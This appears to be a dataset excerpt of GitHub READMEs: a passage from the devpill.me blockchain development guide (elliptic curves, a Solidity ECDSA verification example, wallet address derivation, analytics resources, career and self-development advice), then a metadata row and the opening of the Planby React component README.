How does this relate to the discrete log problem? It turns out that the discrete log problem over the points of an elliptic curve is still very difficult, so we can construct primitives similar to those built on RSA over elliptic curves instead. The advantage over RSA is that they are relatively fast for the same security level, which is why the large majority of encrypted internet traffic today relies on elliptic curve cryptography.
Details on the parameters for curve P-256 can be found [here](https://csrc.nist.gov/csrc/media/events/workshop-on-elliptic-curve-cryptography-standards/documents/papers/session6-adalier-mehmet.pdf). If you are curious about how the addition and multiplication operators are defined over these curves, I recommend this [reading](https://hackernoon.com/what-is-the-math-behind-elliptic-curve-cryptography-f61b25253da3).
##### Digital Signatures
With asymmetric cryptography we can create a new cryptographic primitive called a digital signature. For example, you may want to prove that you hold the private key corresponding to a public key (to authorize a transaction). A simple way to think about this: you "encrypt" information with your private key and allow anyone to use your public key to verify it. The Elliptic Curve Digital Signature Algorithm [ECDSA](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm) is slightly more complex and requires a secure source of randomness as one of its parameters. Nonetheless, this is how you authorize (send) a transaction from your wallet: you sign the transaction with your private key (revealing no information about the private key) to prove you have the authority to authorize it. You can now see how anyone with your private key can authorize transactions on your behalf. *Not your keys, not your crypto.* A minimal on-chain verification sketch follows.
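The sketch below verifies an ECDSA signature on-chain with the `ecrecover` precompile, assuming the common EIP-191 `personal_sign` prefix; production code typically relies on an audited library such as OpenZeppelin's ECDSA helpers, which also guard against signature malleability:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract SignatureVerifier {
    // Returns true if `expectedSigner` produced the (v, r, s) signature
    // over `messageHash` using the personal_sign prefix.
    function verify(
        address expectedSigner,
        bytes32 messageHash,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external pure returns (bool) {
        // Wallets sign the EIP-191 prefix followed by the 32-byte hash.
        bytes32 ethSignedHash = keccak256(
            abi.encodePacked("\x19Ethereum Signed Message:\n32", messageHash)
        );
        return ecrecover(ethSignedHash, v, r, s) == expectedSigner;
    }
}
```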
##### Wallet generation in Ethereum
To generate a wallet address in Ethereum, you first generate a random 256-bit private key using a cryptographically secure source of randomness. Then you use elliptic curve cryptography (the secp256k1 curve) to derive the corresponding public key, a 64-byte value made up of two 256-bit coordinates. Finally, you hash the public key with [keccak256](https://keccak.team/keccak.html) and keep the last 160 bits (20 bytes) as the address. With a 256-bit key, the odds of someone generating a private key already in use (a collision) are on the order of 2<sup>-256</sup>, which makes it computationally unfeasible. A sketch of the final hashing step follows.
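Expressed in Solidity for illustration (the key pair itself is generated off-chain in the wallet, not in a contract), that final step looks roughly like this:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract AddressDerivation {
    // keccak256 over the 64-byte uncompressed public key (the two curve
    // coordinates, without the 0x04 prefix), keeping the final 20 bytes.
    function addressFromPublicKey(bytes calldata pubKey) external pure returns (address) {
        require(pubKey.length == 64, "expected 64-byte uncompressed key");
        return address(uint160(uint256(keccak256(pubKey))));
    }
}
```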
### Protocol development
Coming soon.
### Blockchain data analytics (provisional)
This section will primarily cover EVM based chains as of now. Getting started with data analytics in web3 is really easy, because everything is standardized, there are tons of visualization/explorer tools, and most of the existing analysis in the space is fully open-source. No matter your background and experience level, I recommend starting your analytics journey with SQL - it's the easiest to work with and share by far.
###### Resources for getting started:
- [Guide](https://ath.mirror.xyz/w2cxg5OP1OEcqvSgsEjSSyKRJhPmam0w-fXGogiG-8g) to how to think about web3 data, the tools you'll need across the data stack, and some skills/roles that are common in the space.
- For basics of both SQL and Ethereum, start [here](https://towardsdatascience.com/your-guide-to-basic-sql-while-learning-ethereum-at-the-same-time-9eac17a05929)
- Once you're comfortable with those, start with the intermediate material [here](https://towardsdatascience.com/your-guide-to-intermediate-sql-while-learning-ethereum-at-the-same-time-7b25119ef1e2)
- If you're comfortable with contract tables and want to dive more into the base data tables (transactions, logs, traces) then [check out this](https://ath.mirror.xyz/mbR1n_CvflL1KIKCTG42bnM4HpfGBqDPNndH8mu2eJw) complete break down of an Ethereum transaction (including proxy patterns).
- A lot of event and call data analytics relies on using aggregations to get to the most current state. Skip that noise and go to [storage and state data analysis](https://ath.mirror.xyz/lcZzeBcfpmfQlIHqUBmNAmv5EeVfNBGmr-S7mkWcuyo) when you're ready (this will require you to learn some solidity)
- To fully dive in and become a web3 analyst, check out the [OurNetwork Learn 30 day data course](https://ournetwork.mirror.xyz/gP16wLY-9BA1E_ZuOSv1EUAgYGfK9mELNza8cfgMWPQ) with videos that cover a multitude of topics.
- Once you're ready to start applying to roles, one place to start is [applying to this talent board](https://ilemi.pallet.com/talent) for a chance to have 1:1 help finding a role.
###### Beginner friendly orgs to start getting involved in:
- [MetricsDAO](https://discord.com/invite/metrics) (runs workshops and bounties weekly)
- [Index Coop](https://discord.com/invite/BcqYxdNC3R) (lots of broad protocol analytics generally to learn from)
- [Dune Wizards](https://discord.com/invite/ErrzwBz) (lots of helpers, and some harder bounties)
- [Flipside Gunslingers](https://discord.com/invite/ZmU3jQuu6W) (lots of helpers, and a more focus on cross-chain work like Harmony, Terra, Solana, etc)
###### Some data feeds to follow to keep updated on newest analysis in the space:
- [Dune Digest & Podcast](https://twitter.com/DuneAnalytics/status/1502358536432537607)
- [OurNetwork Weekly Data Newsletter](https://ournetwork.substack.com/)
*More to come soon!*
## Application-based development
Coming soon.
### DeFi
WIP
#### Lending/Borrowing
#### DEXs
#### Yield aggregators
### MEV
Coming soon.
#### The Dark Forest
#### Frontrunning
#### Backrunning
### Creator economy
Coming soon.
### Gaming development
Coming soon.
### Coordination / Public Goods
Coming soon.
## Getting a job
Once you start having a solid foundational skillset within blockchain development you can start looking for junior positions in your area of interest. One of the best parts of web3 is that many projects have open-source codebases which make it much easier to contribute to. There are various structures in web3 that allow a developer to get paid for their work, some of them are:
- working for a company that is building a web3 product
- getting grants from Gitcoin or several different DAOs
- being a DAO core contributor and getting paid with bounties
The easiest way to find a job is to be active on the social platforms of the projects you'd like to be hired at or contribute to. For example, if you want to become a smart contract developer at Uniswap, talk to the team on Discord, suggest new features, implement mockups, apply for a grant, and if you are good enough someone will notice and try to hire you to work full-time within the DAO itself or for Uniswap Labs, the core team leading the smart contract development efforts. The most important thing is to show initiative, be proactive, and openly offer to help. If you come across something interesting, don't forget to post it on Twitter or on Telegram.
In order to find interesting projects to work for, web3 devs look at Twitter as it's the place where everything unfolds and where every single project lives. If you build out a reputation as a good blockchain developer, then you'll start getting DMs from interesting people and projects as there is an extreme lack of talent in the space and insatiable demand for good developers.
### Portfolio
In order to become a good job candidate, it is almost imperative to have a portfolio of projects you've built, to showcase the skills you have, the technologies you use, and your thought processes behind solving different problems. For example, if you are interested in building DeFi applications, you can showcase that by writing a demo of an AMM, a yield aggregator, a money market, etc. The more high-quality demo projects you have the better, as these act as valuable information for teams looking to hire. The most popular way to showcase your projects is to publish them publicly on [GitHub](https://github.com/).
If you don't know what to build, you can look at the problems different projects are facing, try solving one of them, and publish the solution as a public repo on GitHub. You can also build demo projects from sites like [SpeedRunEthereum](https://speedrunethereum.com/) using templates like scaffold-eth, and much more.
### Job boards
The two most used platforms to find crypto/web3 jobs are Twitter and a few select job boards. The main job boards used by recruiters and workers are:
- [crypto.jobs](https://crypto.jobs/)
- [cryptojobslist.com](https://cryptojobslist.com/)
- [bankless job pallet](https://bankless.pallet.com/jobs)
- [web3 career](https://web3.career/)
- [cryptocurrencyjobs](https://cryptocurrencyjobs.co/)
- [web3 pallet](https://web-3.pallet.xyz/)
- [useweb3 jobs](https://useweb3.xyz/jobs)
- [web3 board](https://web3board.io/)
- [defi jobs](https://defi.jobs/)
### Twitter
Twitter is the place to find a blockchain development job, LinkedIn is rarely used for hiring talent in the space, although it's not too uncommon either. As most of the web3/crypto culture resides on Twitter, it is a natural place for developers, founders, creators and users to hangout together. The more value you provide to the community, the more following you'll get, therefore the more outreach as a developer. All teams are thirsty for good developers and so the more relevant followers you have, the more chances you'll get of being discovered by a team looking to hire a blockchain developer in your field of expertise. Building up your Twitter reputation can propel you forwards more than you'd expect, a lot of friendships, partnerships and collaborations have been initiated through Twitter and it is currently the place to account for social value (clout) in the space.
If you manage to demonstrate mastery of any given skill within web3, then you are guaranteed a position pretty much anywhere as all teams are looking for talent. If you are just starting out, but you show a strong drive and initiative to learn then many teams will ask to take you under their wing in order to upscale your skills by getting your hands dirty and learning while building as you go. By being active on relevant social platforms like Twitter, Discord and Telegram and socializing with the right people, finding a job becomes relatively easy as everyone is looking to hire talent.
## Mastery
### Introduction
This mastery section will discuss several soft skills that will help you master any skillset. It is vital not to get stuck in the wrong mindset when learning the skills required to become a great blockchain developer. It is not only about going to a few websites, reading course material, working out some problems, and building applications. Various soft skills will assist you during your journey, which often go unnoticed or are ignored.
### Learning how to learn
Many people focus on the skillsets they need to learn and all the information they need to consume. Rarely do people stop to think twice about how to learn effectively, so that every minute spent on course material yields maximum retention while the time spent is minimized.
This section is inspired by Barbara Oakley's book Learning How to Learn.
#### Lessons from the book
These notes are extracted from [this summary](https://www.allencheng.com/learning-how-to-learn-book-summary-barbara-oakley-terrence-sejnowski-et-al/) of the book. I strongly recommend [reading the book](https://www.amazon.com/Learning-How-Learn-Spending-Studying/dp/0143132547) or taking [Barbara Oakley's Coursera course](https://www.coursera.org/learn/learning-how-to-learn).
1. When you find yourself struggling to solve a problem or learn anything new, try to relax for a few minutes, and then try again later.
2. Procrastination gives you instant pleasure, but it hurts you long-term and makes you highly unproductive.
3. Think in metaphors to learn faster.
4. Learning has no age. Even adults in their 40s or 50s can learn new stuff!
5. Sleeping is important for your brain connections to become stronger and sturdier.
6. Use memory palaces to remember cold, hard facts.
7. Exercise is good not only for your body but also for your brain.
8. Neurons are sophisticated tiny computers in your brain.
9. Focus on different aspects while studying a new subject.
#### More resources on learning how to learn
- [Barbara Oakley's Coursera course](https://www.coursera.org/learn/learning-how-to-learn)
- [How to Learn Anything FASTER - Ali Abdaal](https://www.youtube.com/watch?v=unityETmypk&ab_channel=AliAbdaal)
### How to take notes efficiently
When you constantly have to consume lots of learning materials, it is tough to learn effectively and in a way that your brain can retain for longer. Suppose you want to master any given topic. It is good to write notes as you're learning, especially in a digital format that you can easily query to refresh your memory of the material. If you write practical notes, your brain is forced to think about the subject at hand and more easily synthesizes the ideas and learnings.
Content retention is also heightened when you take good notes since your recollection of a subject is better when focusing on the essential parts of any given learning material.
A great book to improve at notetaking is:
**How to Take Smart Notes: One Simple Technique to Boost Writing, Learning and Thinking – for Students, Academics and Nonfiction Book Writers**
by Sönke Ahrens
[Amazon link](https://www.amazon.com/gp/product/B09V5M8FR5/ref=x_gr_w_bb_sin?ie=UTF8&tag=x_gr_w_bb_sin-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=B09V5M8FR5&SubscriptionId=1MGPYB6YW3HWK55XCGG2)
The book is inspired by the German notetaking method [*zettelkasten*](https://en.wikipedia.org/wiki/Zettelkasten).
**Core principles of How to Take Smart Notes:**
1. Writing is not the outcome of thinking; it is the medium in which thinking takes place
2. Do your work as if writing is the only thing that matters
3. Nobody ever starts from scratch
4. Our tools and techniques are only as valuable as the workflow
5. Standardization enables creativity
6. Our work only gets better when exposed to high-quality feedback
7. Work on multiple, simultaneous projects
8. Organize your notes by context, not by topic
9. Always follow the most interesting path
10. Save contradictory ideas
If you don't want to read the book, you can read [a summary of it](https://fortelabs.co/blog/how-to-take-smart-notes/) and try to apply its principles to your personal notetaking approach.
Next, let's explore different notetaking applications and what they are suitable for.
#### Notion
![](https://images.ctfassets.net/spoqsaf9291f/3URR6bnGgyuzpzRNwtgecf/e37c7dcfabd322a81f926cfffbc7e952/Screen_Shot_2021-09-20_at_6.17.28_PM.png)
[Notion](https://www.notion.so/) is a great notetaking tool for all sorts of things. Whether it is taking notes on a topic that you are trying to master, managing complex projects with your team, creating a knowledge base, managing your daily tasks, and much more.
##### How to use Notion
Here are some external resources to learn how to use Notion. Feel free to submit a pull request to the guide or the devpill.me site with suggestions on more resources.
- [10X your Productivity as a Developer with Notion - Clever Programmer](https://www.youtube.com/watch?v=9PWaOgql-Ts)
- [Notion Mastery - Marie Poulin](https://www.youtube.com/playlist?list=PLpzKoBl909Y1s8hS5QpSlamyGqzmMqzDZ)
- [Keep productive - YouTube](https://www.youtube.com/channel/UCYyaQsm2HyneP9CsIOdihBw)
- [Notion](https://www.youtube.com/channel/UCoSvlWS5XcwaSzIcbuJ-Ysg)
- [Civics Unplugged Notion use cases](https://cucrew.notion.site/How-We-Use-Notion-at-Civics-Unplugged-9b4ec2ef829d4b3cb88335cae712fc56)
Self-Development use case:
- [Gary Sheng's Leadership Blueprint](https://garysbrain.notion.site/garysbrain/Gary-s-Leadership-Blueprint-3020aee8549346c49c2495f5f21dec04)
#### Roam Research
[Roam Research](https://roamresearch.com/) is a notetaking app that leverages the structure of graphs to synthesize and connect different notes and pieces of knowledge by referencing concepts across notes. You can link different ideas in both directions and create mind maps for anything you learn.
![roam research](https://lawsonblake.com/content/images/2020/08/Roam_Page-2.JPG)
Roam Research is a subscription-based paid application ($15 per month or $165 per year). You can also apply for a scholarship to use Roam for free if you are a researcher, under 22, or experiencing financial distress ([link to apply](https://roamresearch.typeform.com/to/Y8ggm3gR?typeform-source=roamresearch.com)).
It is a great way to create a structure for any learning material, whether it is about Solidity, MEV, DeFi, some protocol design, public goods, or anything else. It is a great way to reference concepts and check where else you have referenced them, and expand on each note you take.
##### How to use Roam Research
- [Beginner's Guide to Roam Research - Keep Productive](https://www.youtube.com/watch?v=A_7_8AAkV7M)
- [This Note-Taking App is a Game Changer - Roam Research by Thomas Frank](https://www.youtube.com/watch?v=vxOffM_tVHI&ab_channel=ThomasFrank)
- [How to Take Better Notes With Roam Research - Lawson Blake](https://lawsonblake.com/roam-research-review/)
#### Obsidian
![Obsidian](https://obsidian.md/images/screenshot.png)
[Obsidian](https://obsidian.md/) is a free alternative to Roam research that hosts your graphs locally. Some add-on features or licenses can be paid for as a subscription or one-time payment for added functionality. They will also soon release hosted graphs.
##### How to use Obsidian
- [Your Beginner's Guide to Obsidian](https://www.keepproductive.com/blog/obsidian-beginners-guide)
#### Inkdrop
![Inkdrop](https://beta.docs.inkdrop.app/og-cover-image.jpg)
[Inkdrop](https://www.inkdrop.app/) is a Markdown notetaking application that is highly extensible and focused on developers. I use it to write all of my articles, the [devpill.me](https://devpill.me/) guide, my [article on L2s](https://dcbuilder.mirror.xyz/QX_ELJBQBm1Iq45ktPsz8pWLZN1C52DmEtH09boZuo0), and some other pieces.
I use the Vim extension for writing using [Vim keybindings](https://github.com/vim/vim); I also use the LaTeX extension to occasionally write math equations and some other plugins for modifying how the application looks.
There is a 30-day free trial for the application. Otherwise, it costs $50 per year or $6 per month.
#### Others
For more applications, check out [this article](https://collegeinfogeek.com/best-note-taking-apps/) from College Info Geek comparing different notetaking apps.
### Mentorship
Having guidance is extremely important to grow as rapidly as possible and make the most effective use of your time. I want to share some of the lessons I have learned over the past four years of researching blockchain development and web3. I don't want new developers to feel as overwhelmed by the number of possibilities and lack of structured guidance as I did.
In the crypto and broader web3 ecosystems, thought leaders spearhead different missions, values, and goals and drive the industry forward. When you are just starting out, following these leaders and analyzing how they reached their position is an excellent way to understand what you need to do to achieve your own goals within a particular field. If you are interested in creating useful DeFi primitives, then you have to analyze exemplary founders and builders of current as well as the up and coming DeFi protocols; good examples include [Hayden Adams](https://twitter.com/haydenzadams) (Uniswap), [Stani Kulechov](https://twitter.com/StaniKulechov) (Aave), [Robert Leshner](https://twitter.com/rleshner) (Compound), [@scupytrooples](https://twitter.com/scupytrooples) (Alchemix), etc.
#### EthernautDAO
EthernautDAO is a community of builders that tries to convert developers from other fields into blockchain developers through mentorship programs. There are two main types of members in EthernautDAO: mentors and mentees (students). Mentors come from different established protocols, DAOs, projects, and companies in the industry and are looking to train and hire skilled developers. The process is relatively simple: a mentor posts an opening for a specific type of mentorship, students apply, and if they get accepted, they receive mentorship and often either compensation or the chance to get hired by the company the mentor belongs to.
#### Twitter
The leading platform for news, discourse, education, and interaction within the web3 space is Twitter. Almost everyone interacts on Twitter, and so as someone looking to learn and get mentorship, it is a great place to try and get hired (take a look at the [Getting a job section](https://www.devpill.me/docs/getting-a-job/introduction/)) and accrue [social capital](https://www.devpill.me/docs/social-capital/introduction/). As you build a portfolio that showcases your skills, it will act as your reputation in the space. You can leverage that reputation on Twitter to start working on different projects (getting a job) or interacting with skilled individuals who are generally very willing to help people learn and become better (great to get mentorship).
#### Development bootcamps
Another option for getting valuable guidance is finding a community of people going through the same challenges you are. You will gain access to experienced builders, excellent educational materials, and more through development bootcamps and e-learning platforms like the ones listed below.
A non-exhaustive list of learning platforms:
- [Buildspace](https://buildspace.com/) (free)
- [Cadena](https://cadena.dev/) (free)
- [Encode club](https://www.encode.club/encode-bootcamps) (paid)
- [Consensys Academy](https://consensys.net/academy/bootcamp/) (expensive bootcamp)
- [BuidlGuidl](https://buidlguidl.com/) (free)
- [Learn Web3](https://www.learnweb3.io/) (free)
- Affiliated (I, dcbuilder, am an advisor):
- [Artemis](https://www.artemis.education/) (free / income sharing)
- [Crystalize](https://crystalize.dev/) (income sharing)
### Mastery
Mastery of a craft can only be achieved when individuals hone their skills to the utmost and become competent experts. To acquire knowledge of a specific skillset, the individual needs to devote a lot of time and concentrated effort to learning as many of the intricacies, nuances, and details of their craft as possible. They also need to assimilate that information into the abilities needed to wield their art. They need to constantly keep up with the pace of development within that craft to keep their skills state of the art. In the context of blockchain development, this involves:
- Keeping up with the current standard development stacks.
- Looking into newly emerging technologies.
- Developing a deep understanding of the field to critically assess the pros and cons of using a specific technology or architecture.

Many principles behind mastery and the journey of achieving peak human performance are studied in various fields like neurology (for learning-related matters), psychology, physiology, social sciences, self-development studies, and more.
A good entry book is Robert Greene's *Mastery*. It details the steps that the most capable people throughout human history have followed to achieve greatness and mastery of their craft. You can find a good summary of the book's principles [here](https://www.nateliason.com/notes/mastery-robert-greene).
The main sections of the book are:
1. Discovering Your Calling
2. Submit to Reality: The Ideal Apprenticeship
3. Absorb the Master's Power: The Mentor Dynamic
4. See People as they Are: Social Intelligence
5. Awaken the Dimensional Mind: The Creative-Active
6. Fuse the Intuitive with the Rational: Mastery
Becoming a master of blockchain development or its specializations is a never-ending process. However, the possibilities for what you can create are endless, and all of its skillsets are highly valuable and sought after.
I'm personally excited about what the masters of the future will be able to build and how that will enable the future of human coordination, public goods, and regenerative crypto-economics.
#### Rationality
Rationality is the quest of trying to find the truth systematically. A great book about rationality is '[Rationality: From AI to Zombies](https://intelligence.org/rationality-ai-zombies/)' by Eliezer Yudkowsky (thank you, [Rai](https://twitter.com/0xRaino), for the recommendation).
From the book: "When we talk about rationality, we're generally talking about either epistemic rationality (systematic methods of finding out the truth) or instrumental rationality (systematic methods of making the world more like we would like it to be). We can discuss these in the forms of probability theory and decision theory, but this doesn't fully cover the difficulty of being rational as a human. There is a lot more to rationality than just the formal theories."
The book comprises six smaller books:
- Book I: Map and Territory
- Book II: How to Actually Change Your Mind
- Book III: The Machine in the Ghost
- Book IV: Mere Reality
- Book V: Mere Goodness
- Book VI: Becoming Stronger
You can read the sections sequentially, as they originally come from blog posts he wrote. Each section goes through a different area of rationality.
### Time management
Time management is vital to becoming an efficient developer, especially in crypto / web3, where there are so many distractions and shiny objects that it is hard to focus on essential tasks.
#### Planning
Planning your days ahead of time is essential to maximize productivity as a developer, especially if you are a freelancer or don't have a robust synchronous structure within your organization. Since many web3 developers work remotely and teams coordinate asynchronously using tools like GitHub, Zoom / Google Meet, etc., it is essential to book the times you will spend working on a particular task or area.
I'd recommend planning your day the day before and filling in all the necessary tasks as you need them. You will get better at planning the more you do it, as you'll be able to see what works for you and what you need to polish.
I try to schedule everything, from travel to bookings, personal affairs, periods for exercising, eating, reading, learning, working, events, calls, meetings, etc. I used to spend way too much time procrastinating and just going through the motions; if I had had a system to use my time efficiently, I would not have lost so much time in vain.
I've recently started using [Cron](https://cron.com/), a calendar interface that can hook up to Google accounts. The application aggregates all of your connected Google accounts' calendars. It sends notifications for meetings early, the UI/UX is impressive, booking new events is very intuitive, and it allows you to send invites from any account.
For scheduling meetings, I recommend using [Calendly](https://calendly.com/) or similar services that allow you to give other people links with pre-filled slots showing your availability. The people you want to meet with can use the link to book a specific time with you; the event will subsequently appear in your calendar app of choice.
To get deeper into planning/scheduling and developing high performance, I recommend reading these two books, which are my personal favorites:
- [The Power of Habit](https://www.shortform.com/summary/the-power-of-habit-summary-charles-duhigg?utm_source=google&utm_medium=cpc) - Charles Duhigg
- [High Performance Habits](https://www.amazon.com/High-Performance-Habits-Extraordinary-People/dp/1401952852) - Brendon Burchard
#### Project management
As a software developer, you're going to work with many different people when you join a team or try to build a product yourself - from designers, front/back end devs, DevOps, data engineers to lawyers, product managers, etc. There will be systems set in place in the most mature developer environments to coordinate as an organization. Popular methods are [Agile](https://www.atlassian.com/agile#:~:text=Agile%20is%20an%20iterative%20approach,small%2C%20but%20consumable%2C%20increments.) and [SCRUM](https://en.wikipedia.org/wiki/Scrum_(software_development)). Popular apps for managing all of these processes, tasks, and interactions include tools like Asana, Linear, Jira, Trello, Notion, etc.
### Self-development
To reach your peak, you need to create a sustainable set of habits that will allow you to keep working hard consistently. Since we are all human beings, we need to keep our bodies in check, as they are the hosts for our brains responsible for producing bug-free code. Note that this section is not professional advice as I am not an expert in these fields, and I am not a licensed advisor. If you want guidance in any areas covered, please consult with an expert trainer, nutritionist, therapist, coach, etc.
#### Working out
Exercise is an integral part of life as it allows the body to maintain physical fitness, health, and overall wellness. Developers are usually portrayed in modern culture as people who do not exercise very often, as sedentary people who sit on a chair all day and do not prioritize their health. It is essential to be active throughout the day even though we are programming most of the time. I recommend using a standing desk that you can adjust for any height. You can stand up and keep coding when you are tired of sitting. Some individuals also get a small walking board underneath the table to walk while coding.
Another good technique is a slight modification of the Pomodoro technique that replaces the break period with a short exercise period. The most prevalent version consists of 45 minutes of focused work and a 15-minute workout. I like to alternate activities during the workout period.
Other positive effects of exercising include clearer thinking, as the brain gets more oxygen inflow, a stronger immune and cardiovascular system, and more. For more guidance on achieving physical fitness and what exercises to do, please consult with an expert.
#### Nutrition
Nutrition is an area that is very easy to overlook, especially when an individual is young and their metabolism can deal with living an unhealthy lifestyle.
Eating the right amounts of food within a varied diet is an integral part of a healthy lifestyle, and everyone should take it seriously. For more information, please consult with a nutritionist or dietary expert or do your research as nutrition varies a lot per individual, and I'm not qualified to give advice.
### Other
Self-development is a very wide topic, and there's a lot more to improve than health, fitness, and nutrition. You can improve your mindset, define your own values, and create systems that will allow you to uphold those values as you go about life; there's also spiritual discovery, learning about various aspects of life, etc. Most of these other topics, although significant, do not have a direct impact on your performance as a developer, so I'll refrain from talking about them. Feel free to suggest any changes to this section via a GitHub pull request.
## Social Capital
### Introduction
Social capital expresses how much influence you have within social circles. Good metrics to denominate social capital in are:
- relevant followers across social platforms within the industry
- reputation formed by building, creating, contributing to the space
- friends in the space that will help you grow, that you can learn from, that you can rely on, that you can discuss your ideas with and get constructive criticism from.
- connections with people that can introduce you or vouch for you in different situations
- etc
There are various methods to accrue social capital, which will be discussed within this guide and expanded upon over time. Most consist of putting out relevant content, networking and interacting with people in the space, building products, contributing to the ecosystem in different ways, providing value (or fun), and many other approaches.
In order to meet 'good' people in the space, you also need to spend your time in the right places doing the right things. This guide will help you streamline your focus and save time by not wasting it in places where people are not listening or which serve goals other than accruing social capital.
Another important aspect of accruing social capital is putting out content which other people find interesting, engaging, relevant, or valuable. As a developer in the space, your content should provide value to other people within the space: to developers, and to other people wanting a more technical overview of the field/products/projects you're working on. There's also lots of potential to accrue social capital by creating educational resources like trivia, fun facts, guides, tutorials, reviews, talks, discussions, debates, etc. A good example of this is devpill.me itself: by contributing content to this public good guide, I (dcbuild3r) let others know about me and about the resource I'm creating that benefits anyone, and people who are interested in learning about blockchain development follow me.
### How to leverage social platforms to grow as a developer
The most relevant platforms to interact with people in the space are:
#### Twitter
Twitter is used to write short-form content that either redirects to long-form content (Medium, Mirror, Substack articles, etc.) or is short enough to fit in a few tweets, unless you write a 206-tweet-long thread (in which case @thereaderapp is useful for making long threads readable).
#### Telegram
Telegram is a single-threaded chatting platform which is generally used for simple group chats and newsletters in crypto. As a developer, there are a few groups you can follow within your specific realm of interest, or you can create group chats with friends in order to discuss various topics, create a learning group for a programming language, protocol, or topic, and more. Telegram is good for simple one-thread conversations where you don’t need to manage asynchronous communication.
#### Discord
Discord groups are useful once you have a big community, DAO, or friend group which you want to participate in. For developers there are various good groups like Buildspace, Developer DAO, and others. It is also used by different teams to manage contributions to an application, protocol, or service. For example, if you become a contributor to an open-source project like Aave, you want to recommend a change to one of its open codebases, and the change gets accepted, the coordination and all the processes usually go through Discord. Many projects also help new contributors get started with building on the project, and if you are learning something new it is a good place to ask technical questions.
#### Real life events
Although not accessible to everyone, there are events hosted all around the world where people from different communities within web3 and crypto gather together to organize conferences, hackathons, parties, meetups, talks, and more. Real-life events are one of the best places to find like-minded people to become friends with, to get hired, to network with other interesting people in the space, to learn, to build new projects at hackathons and push your own boundaries, etc. It is underrated just how much you can grow as a developer if you surround yourself with people that have the qualities you want to acquire for yourself. The people around you can push you to grow and take you to new heights as they expose you to new challenges and help you along the way.
### Who to interact with
When you are on the social platforms mentioned above you should target the people that help you grow, and make connections with them.
- experts in your preferred field of interest
If you talk to people with expertise in the fields that you want to become skilled in, you'll have a much easier time learning them, you'll make good connections that will propel you forward in your career, and you will most likely have more opportunities and resources to grow as a developer: getting hired, getting tips on how to learn about your specialization efficiently, and more!
- people trying to learn the same things you are learning
It is good to share ideas and have two-way feedback on any topic you are learning with other people studying the same material, especially if they are more experienced than you. Another good reason to learn in groups (ideally pairs) is that teaching is the best way to solidify your own knowledge: to explain a complex topic simply, you need to understand it well enough to be capable of explaining it. More on this in the [Mastery](https://www.devpill.me/docs/mastery/introduction) section.
- people building other primitives in the web3/crypto space (expand horizons)
As someone trying to learn more about blockchain development, especially when you are starting out, it is great to explore at the beginning and try many different things before you start specializing in any given field of development. That's why you should follow the most proficient people in different fields in order to get a bird's-eye view of the space. I also recommend reading over the other sections within devpill.me so that you can see what is out there to learn.
### What content to put out
In order to amass social capital, putting out good content on different popular social platforms is crucial, as people like to follow individuals and groups that they can get value from. E.g.: if you start talking about building in DeFi, then individuals interested in DeFi will start to follow you, like and retweet your posts, engage in conversations in the comments, etc. As a blockchain developer in any specialization, there are different ways in which you can provide interesting content and distribute it across different social platforms.
- document > create at the beginning
When you start out as a blockchain developer you usually won't have any novel findings, cool things that you are building, or projects you are working on, so it is good to share your own learning process and your journey to becoming a blockchain developer.
- talk about your learnings in your journey:
It is good to talk about the different resources you are using to learn the topics you are interested in, share them with others, and tell them how they have helped you learn about a specific topic. Also provide commentary and helpful tips which might be missed by people who only skim through the resources and haven't gone into depth.
- talk about the tools you use:
Developers love to talk about their tooling, what libraries they use, what IDE and extensions they use to write code, what services, and applications they use on a daily basis to organize themselves and be productive, and much more.
- ask questions about the things you are learning:
Chances are that many people following you have had the same questions as you in the past, and they can provide you with a lot of helpful insight about any given topic.
- be active in threads that are relevant to your interests:
If there are relevant events happening within the space that you are interested in, it is a good idea to engage in public discourse with other people around those events in order to get a better overview of what's happening and to try to extract valuable information / learnings out of it.
- retweet things that happen within your field of interest with commentary / opinions
- summarize articles, talks, events, updates, discuss code within the projects / fields that interest you.
- shitpost (express your own personality / be yourself) for engagement (grows your network whilst having fun):
Be creative, development doesn't need to be everything you talk about, many also use social platforms to make friends and have fun, so you can also do funny content, light-hearted threads on any given topic, post pictures of your dog, or whatever you want. Expressing your own individuality is also useful to create your own personal brand on socials.
## Conclusion
Thank you for checking out the blockchain development guide. If there is any content you'd like to see added, please check out the [contributors](#contributors) section and suggest it there. The goal is to make this guide and [devpill.me](https://devpill.me/) the best blockchain development guide out there. Thank you for your support.
## Special thanks
Special thanks to all the contributors:
- [@protolambda](https://twitter.com/protolambda) - author of the [Ethereum core development section](https://www.devpill.me/docs/core-development/introduction/)
- [@0xjepsen](https://twitter.com/0xjepsen) - author of the [cryptography section](https://www.devpill.me/docs/cryptography/introduction/)
| Devpill.me - A Public Good Blockchain Development Guide | ethereum,blockchain-development,solidity,full-stack,decentralized-finance,mev | 0 | 33 | 16 | 78 | 3 | 3 | 0 |
karolkozer/planby | <div align="center" style="margin-bottom: 10px">
<a href="https://www.npmjs.com/package/planby">
<img src="https://i.postimg.cc/J0XMPHNQ/planby-logo.png" alt="Planby logo" />
</a>
</div>
<div align="center" style="margin-bottom: 20px">
<a href="https://www.npmjs.com/package/planby">
<img alt="npm" src="https://img.shields.io/npm/v/planby" />
</a>
<a href="https://npmjs.org/package/planby">
<img alt="downloads" src="https://badgen.net/npm/dm/planby" />
</a>
<a href="https://npmjs.org/package/planby">
<img alt="downloads" src="https://img.shields.io/npm/dt/planby?color=%2327ae60&label=recent%20downloads" />
</a>
<a href="https://opencollective.com/planby#sponsor" target="_blank"><img src="https://img.shields.io/badge/Support%20us-Open%20Collective-41B883.svg" alt="Support us"></a>
</div>
## Description
Planby is a React-based component for quickly implementing an EPG, schedules, live streaming, music events, timelines, and many more ideas. It uses a custom virtual view which allows you to operate on very large amounts of data. The component has a simple API that you can easily integrate with other third-party UI libraries. The component theme can be customised to the needs of the application design.
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/6p2GDGMX/tv-preview-custom.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/s2Pn9jGZ/planby-conf-event.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
